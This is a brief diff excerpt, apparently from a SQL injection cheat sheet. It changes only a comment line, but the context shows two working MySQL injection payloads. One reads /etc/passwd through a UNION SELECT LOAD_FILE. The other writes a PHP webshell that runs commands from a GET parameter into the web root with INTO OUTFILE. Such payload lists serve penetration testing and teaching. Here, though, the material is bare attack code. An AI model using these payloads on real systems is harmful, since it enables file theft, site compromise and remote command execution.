 ' UNION SELECT LOAD_FILE('/etc/passwd'),NULL-- -

-# MySQL — write webshell
+# MySQL — write a webshell (requires write access to web root)

 ' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -